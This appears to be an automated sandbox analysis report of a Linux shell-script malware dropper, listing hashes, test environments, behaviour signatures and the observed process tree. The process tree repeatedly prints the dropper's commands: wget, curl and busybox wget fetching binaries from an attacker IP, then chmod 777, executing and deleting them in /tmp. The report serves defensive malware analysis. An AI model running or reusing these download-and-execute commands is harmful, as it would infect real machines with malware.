Analysis
-
max time kernel
42s -
max time network
130s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240611-en -
resource tags
arch:amd64, arch:i386, image:ubuntu1804-amd64-20240611-en, kernel:4.15.0-213-generic, locale:en-us, os:ubuntu-18.04-amd64, system -
submitted
21/11/2024, 08:14
Static task
static1
Behavioral task
behavioral1
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-armhf-20240729-en
Behavioral task
behavioral3
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh
-
Size
10KB
-
MD5
77bee17b866cc1fd41dd0e6795516a37
-
SHA1
fbe900100ffafc804c69a94b5ee81405100c02e5
-
SHA256
bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f
-
SHA512
6284423f5b87140261dee3ec564d00d38f4dd59dd41f86a9d342027230a4012db3224b4cb8e9341a4a30ffcb73b822319b88a65d51c55678886b6a708fa62d4d
-
SSDEEP
192:YnrtGG7NhRmOJQM4+2IJ7Rk8UD+u0KCaHHRYbAQrHB+GvrHB+GRnrtGGJNhRmOuX:8NhRmOJQM4+xJ7dfKOAQrHB+GvrHB+Gy
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh/tmp/bbb77661367bd4071740b3ca95c991f017dbfc6d49c9fad696dddd7cbedc237f.sh1⤵PID:1526
-
/bin/rm/bin/rm bins.sh2⤵PID:1527
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Writes file to tmp directory
PID:1533
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1534
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:1535
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:1536
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1537
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1538
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Writes file to tmp directory
PID:1539
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1540
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:1541
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:1542
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1543
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1544
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Writes file to tmp directory
PID:1545
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1546
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:1547
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:1548
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1549
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1550
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Writes file to tmp directory
PID:1551
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1552
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:1553
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:1554
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1555
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1556
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Writes file to tmp directory
PID:1557
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1558
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:1559
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:1560
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1561
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1562
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Writes file to tmp directory
PID:1563
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1564
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:1565
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:1566
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1567
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1568
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Writes file to tmp directory
PID:1569
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1570
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:1571
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:1572
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1573
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1574
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Writes file to tmp directory
PID:1575
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1576
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:1577
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:1578
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1579
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1580
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Writes file to tmp directory
PID:1581
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1582
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:1583
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:1584
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1585
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1586
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Writes file to tmp directory
PID:1587
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1588
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:1589
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:1590
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1591
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1592
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Writes file to tmp directory
PID:1593
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1594
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:1595
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:1596
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1597
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1598
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Writes file to tmp directory
PID:1599
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1600
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:1601
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:1602
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1603
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1604
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Writes file to tmp directory
PID:1605
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1606
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:1607
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:1608
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1609
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1610
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Writes file to tmp directory
PID:1611
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1612
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:1613
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:1614
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1615
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1616
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Writes file to tmp directory
PID:1617
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1618
-
-
/bin/chmodchmod 777 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- File and Directory Permissions Modification
PID:1619
-
-
/tmp/2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb./2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵
- Executes dropped EXE
PID:1620
-
-
/bin/rmrm 2OUJ87yUwEMH5vkZLgZ32qHjjMx6jaP2Hb2⤵PID:1621
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1622
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Writes file to tmp directory
PID:1623
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1624
-
-
/bin/chmodchmod 777 e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- File and Directory Permissions Modification
PID:1625
-
-
/tmp/e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN./e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵
- Executes dropped EXE
PID:1626
-
-
/bin/rmrm e81v4mmB0VXqxAsOG7uQt0J83UpiLoyjVN2⤵PID:1627
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1628
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Writes file to tmp directory
PID:1629
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1630
-
-
/bin/chmodchmod 777 b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- File and Directory Permissions Modification
PID:1631
-
-
/tmp/b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n./b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵
- Executes dropped EXE
PID:1632
-
-
/bin/rmrm b2FGs95mFuYYXDBu3HpTy2fY1Q27asFU3n2⤵PID:1633
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1634
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Writes file to tmp directory
PID:1635
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1636
-
-
/bin/chmodchmod 777 pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- File and Directory Permissions Modification
PID:1637
-
-
/tmp/pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr./pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵
- Executes dropped EXE
PID:1638
-
-
/bin/rmrm pebU8NLJ2QZm3ljGLG6AjiGvKW3L2zgyFr2⤵PID:1639
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1640
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Writes file to tmp directory
PID:1641
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1642
-
-
/bin/chmodchmod 777 R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij./R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm R6JtIiTg7Cg2azn4w4oDKBJyrgATUVyfij2⤵PID:1647
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1650
-
-
/bin/chmodchmod 777 rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR./rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm rA8TxQwqLmHMgt5WJOMQMZZPYO6SeeSdMR2⤵PID:1653
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1656
-
-
/bin/chmodchmod 777 rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK./rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm rCUQoU8oBiCcEg5qTgbyNfHBsEtY11Y9aK2⤵PID:1659
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1660
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1662
-
-
/bin/chmodchmod 777 ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll./ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm ezk2IT2dVBwQgBhEHIMVRyOqkUIiZ2m5Ll2⤵PID:1665
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1666
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1668
-
-
/bin/chmodchmod 777 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv./7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm 7cLNA9H2S3BsuPg5j9PCz1w9Zbrt411uGv2⤵PID:1671
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1674
-
-
/bin/chmodchmod 777 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI./5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm 5l4Jhg0nKpedT0d1oZFp9RyhuMSRMFcxMI2⤵PID:1677
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1678
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1680
-
-
/bin/chmodchmod 777 FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/FHbdJp4ofFQE563YPPEO84Mlg55XHua9K4./FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm FHbdJp4ofFQE563YPPEO84Mlg55XHua9K42⤵PID:1683
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1684
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Writes file to tmp directory
PID:1685
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1686
-
-
/bin/chmodchmod 777 tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- File and Directory Permissions Modification
PID:1687
-
-
/tmp/tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH./tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵
- Executes dropped EXE
PID:1688
-
-
/bin/rmrm tgsOhUvjmRjf2CBhhW9EMnEYAjeucOOmgH2⤵PID:1689
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1690
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Writes file to tmp directory
PID:1691
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1692
-
-
/bin/chmodchmod 777 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- File and Directory Permissions Modification
PID:1693
-
-
/tmp/2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD./2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵
- Executes dropped EXE
PID:1694
-
-
/bin/rmrm 2ztLXeAOigeOY44ahCLMb1hoCslqoEooJD2⤵PID:1695
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1696
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Writes file to tmp directory
PID:1697
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1698
-
-
/bin/chmodchmod 777 sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- File and Directory Permissions Modification
PID:1699
-
-
/tmp/sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd./sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵
- Executes dropped EXE
PID:1700
-
-
/bin/rmrm sXmLfTQZLQDyxKa1AvY2uJa7K73tGoe4xd2⤵PID:1701
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97